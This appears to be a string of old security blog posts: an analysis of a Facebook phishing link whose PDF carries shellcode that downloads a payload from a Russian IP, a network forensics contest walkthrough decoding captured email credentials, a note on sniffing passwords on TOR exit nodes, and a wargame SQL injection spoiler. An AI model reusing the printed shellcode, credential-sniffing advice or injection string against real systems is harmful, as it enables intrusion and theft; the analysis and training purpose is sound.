Malware is not hosted here.

Even though Symantec claims the site is infected with malware - I assure you - it is not.

Symantec notes that my previous post quoted a snip of Javascript that has been used in malware.

I've modified the javascript snip so that Symantec doesn't trip. Let me know if that doesn't fix it.

Received an email in my spam box this morning with a link:

http://www.facebook.com.ferdasxe.be/usersdirectory/LoginFacebook.php?ref=[32 Char Number]&email=[My Email]

The domain resolves to a number of IPs:

www.facebook.com.ferdasxe.be. 1783 IN A 190.120.139.2
www.facebook.com.ferdasxe.be. 1783 IN A 190.247.140.107
www.facebook.com.ferdasxe.be. 1783 IN A 201.17.33.210
www.facebook.com.ferdasxe.be. 1783 IN A 201.165.72.35
www.facebook.com.ferdasxe.be. 1783 IN A 201.226.241.26
www.facebook.com.ferdasxe.be. 1783 IN A 210.112.142.61
www.facebook.com.ferdasxe.be. 1783 IN A 213.248.149.69
www.facebook.com.ferdasxe.be. 1783 IN A 60.50.84.69
www.facebook.com.ferdasxe.be. 1783 IN A 115.252.47.55
www.facebook.com.ferdasxe.be. 1783 IN A 117.242.112.254
www.facebook.com.ferdasxe.be. 1783 IN A 186.32.89.215
www.facebook.com.ferdasxe.be. 1783 IN A 189.105.95.34
www.facebook.com.ferdasxe.be. 1783 IN A 189.179.6.137
www.facebook.com.ferdasxe.be. 1783 IN A 190.7.132.216
www.facebook.com.ferdasxe.be. 1783 IN A 190.37.112.49

An iframe on this page grabs /sv/in.php from 193.104.27.234

Javascript within in.php grabs /sv/xd/pdf.pdf from 193.104.27.234

80758e30f8beb7fa79f6346b85f6cf31 pdf.pdf

Which contains more javascript:


(Snipped)
{
var vvpethya =unescape("

%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u3931%u2E33%u3031%u2E34%u3732%u322E%u3433%u732F%u2F76%u6F6C%u6461%u702E%u7068");
(Snipped)

This grabs load.php from the /sv/ directory on host 193.104.27.234. This IP is hosted in Russia.

C&C Traffic:

POST /beslip/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 193.104.41.68
....
snip
....
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 26 Nov 2009 18:36:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6

Network Forensics Contest - Part II Answers

Woohoo....I got them all right. I kind of figured I would though - if not, I should find a new job.

I'm talking about ForensicsContest.com - a site to help educate the masses and keep security teams sharp

If you haven't done packet capture analysis in a while, I suggest you visit the site and start from the beginning.

Linux Walkthru:

1. What is Ann’s email address?
2. What is Ann’s email password?
3. What is Ann’s secret lover’s email address?
4. What two items did Ann tell her secret lover to bring?
5. What is the NAME of the attachment Ann sent to her secret lover?
6. What is the MD5sum of the attachment Ann sent to her secret lover?
7. In what CITY and COUNTRY is their rendez-vous point?
8. What is the MD5sum of the image embedded in the document?

First things first, verify the MD5SUM of the evidence file:

$ md5sum evidence02.pcap
cfac149a49175ac8e89d5b5b5d69bad3 evidence02.pcap

Next, viewing the packet capture with TCPDump, grab the email auth:

tcpdump -Alnqvvvs0 -r evidence02.pcap port 587 |less

.....

250-AUTH=LOGIN PLAIN XAOL-UAS-MB
250-AUTH LOGIN PLAIN XAOL-UAS-MB
250-STARTTLS
250-CHUNKING
250-BINARYMIME
250-X-AOL-FWD-BY-REF
250-X-AOL-DIV_TAG
250-X-AOL-OUTBOX-COPY
250 HELP

06:35:31.222415 IP (tos 0x0, ttl 128, id 126, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.159.1036 > 64.12.102.142.587: tcp 12
E..4.~@....d....@.f....K....&6.3P.......AUTH LOGIN

06:35:31.222996 IP (tos 0x0, ttl 127, id 7762, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.R......@.f......K..&6.3....P...x...
06:35:31.332979 IP (tos 0x0, ttl 127, id 7763, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.S......@.f......K..&6.3....P....J..334 VXNlcm5hbWU6

06:35:31.333745 IP (tos 0x0, ttl 128, id 127, offset 0, flags [DF], proto TCP (6), length 66) 192.168.1.159.1036 > 64.12.102.142.587: tcp 26
E..B..@....U....@.f....K....&6.EP...O...c25lYWt5ZzMza0Bhb2wuY29t

06:35:31.334435 IP (tos 0x0, ttl 127, id 7764, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.T......@.f......K..&6.E....P...x...
06:35:31.444079 IP (tos 0x0, ttl 127, id 7765, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.U......@.f......K..&6.E....P....6..334 UGFzc3dvcmQ6

06:35:31.444690 IP (tos 0x0, ttl 128, id 128, offset 0, flags [DF], proto TCP (6), length 54) 192.168.1.159.1036 > 64.12.102.142.587: tcp 14
E..6..@....`....@.f....K....&6.WP...S
..NTU4cjAwbHo=

Pay special attention to the 334 status code:

334 VXNlcm5hbWU6 => Username:

334 UGFzc3dvcmQ6 => Password:

Immediately following each 334 status code is another base64 encoded string:

c25lYWt5ZzMza0Bhb2wuY29t => sneakyg33k@aol.com

NTU4cjAwbHo= => 558r00lz

As you can see, you have the first two answers - this isn't going to be too hard. (Yes, I know about tools like ettercap, mailsnarf and dsniff that will extract this data off the wire - lets pretend we don't know about them)

Looking at the packet capture you'll see an email to sec558@gmail.com, but read carefully, the question is: What is Ann’s secret lover’s email address? The email to sec558 doesn't appear to be loving:

Sorry-- I can't do lunch next week after all. Heading out of town. Another time! -Ann.

A little further into the packet we see another email, this time to mistersecretx@aol.com:

Hi sweetheart! Bring your fake passport and a bathing suit. Address attached. love, Ann.

With an attachment:

Content-Transfer-Encoding: base64.
Content-Disposition: attachment;.
filename="secretrendezvous.docx"

Using wireshark, Follow the TCPStream for this packet and extract the base64 encoded attachment.

I used openssl to decode the base64 content like so:

$ openssl base64 -d -in email-attachment.b64 -out secretrendezvous.docx.

DOCX formatted files are also pkzip files, as shown by the "file" command:

$ md5sum secretrendezvous.docx; file secretrendezvous.docx
9e423e11db88f01bbff81172839e1923 secretrendezvous.docx
secretrendezvous.docx: Zip archive data, at least v2.0 to extract

by unzipping the file, you are able to extract image1.png

$ md5sum image1.png; file image1.png
aadeace50997b1ba24b09ac2ef1940b7 image1.png
image1.png: PNG image, 756 x 439, 8-bit/color RGB, non-interlaced

Which givs you the last two answers....

Total time from download to completetion, including screen shotting all of my work, took less than 15 minutes.

I would have had enough time to meet Ann at the airport, steal her identity and enjoy my trip to Mexico! :)

Reloading the old site

Many of you know that I used to have another blog and some of you may notice that it disappeared. Its still there, if you look hard enough, but I wont be making any updates. 

I just don't have the time like I used to, and I feel a blog shouldn't be "professional" only. So here goes - the old old blog is new again, and if you like what I have to write, your welcome to follow. Don't expect me to stay on topic - and don't expect updates too frequently. I'll put up some twitter feed to the right hand side of the page for those who choose to follow me there.

Domain Brute Forcer

This morning I found myself in a position where I needed to run a pentest without access to the internet. Sadly I also left my toolkit (laptop) at home, as I wasn't expecting to do this test.

Since I didn't have access to the internet, I couldn't download one of the many domain brute forcing tools...and that is exactly what I needed.

Since I had some time on my hands, I tossed together my own brute forcer. Its not well coded, but its proof that you really can pull tools out of your arse in a pinch.


Grab the script here.

Password Sniffing With TOR.

This afternoon I was approached by an indivual online who wanted to know if I could tell him how to sniff passwords off TOR like explained here:

http://www.theregister.co.uk/2007/09/10/misuse_of_tor_led_to_embassy_password_breach/

Of course he (or she) claimed that they wanted to prove it couldn't be done - yea right.

However, its really not all that hard. Many TOR exit nodes sniff their exit traffic. Most do so to protect themselves, some do so to capture credentials...there has even been rumors of the feds doing it to locate child porn sites.

Whatever the reason, using wireshark is a quick and easy way to sniff all the traffic, however if you have a busy exit node, you'll fill up your harddrive pretty quick, even if you only capture a few hundred bytes of each packet.

So back to the question at hand....using ettercap or dsniff will help you capture credentials without recording the full packet.

Now go play nice.

Dare Your Mind

This evening I was approached by an internet drifter about a SQL injection problem. He was playing an online hacker game located at http://www.dareyourmind.net.

His problem was with the page http://www.dareyourmind.net/menu.php?page=sqlexploit3.

At first glance I thought "SQL exploit", then I read the information left by the author:

Listito has modified his girls contact php form to obtain fastly phone numbers... Because you have not the right session cookie, you cannot see phone list but you have to find even though the phone number of Nicole to validate this chall !

So my next thought was 'oh, session hijacking...TCP?....cookie...hmmm...XSS?'

The drifter assured me that I didn't have to try XSS, he'd found some SQL injection:

1 union all select *,null,null,null from information_schema.tables #

Which didn't quite work. I promised to take a look, and went off to dinner.

Once I returned, the first thing I did was open WebScarab and intercepted all GET and POST's from my browser. Wow, this site was prepared. It tossed in lots of background noise, so I disabled the "GET" and focused only on POST, which is where the id=1 string was passed to http://www.dareyourmind.net/real/sql3/list.php. (Warning, this is hardly work safe!)

As it turns out, there are four columns. I was already told that much.

After little more than 30 minutes, the correct string is: (hidden, black text on black background, highlight below the 'spoiler' snips)

--SPOILER BELOW--

id=3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --

Which means the answer is: 1425753498 (though that will probably change when the author gets word that it has been posted.)

--SPOILER ABOVE--

No, I'm not trying to ruin the game. You should go figure out how each statement works, and how to SQL inject on your own. This is a spoiler for those lamers who can't figure it out. I wont post any more answers from the dareyourmind.net challenges, and I wont help you if you track me down. I was bored, this challenge was tempting...and it has been awhile since I posted something.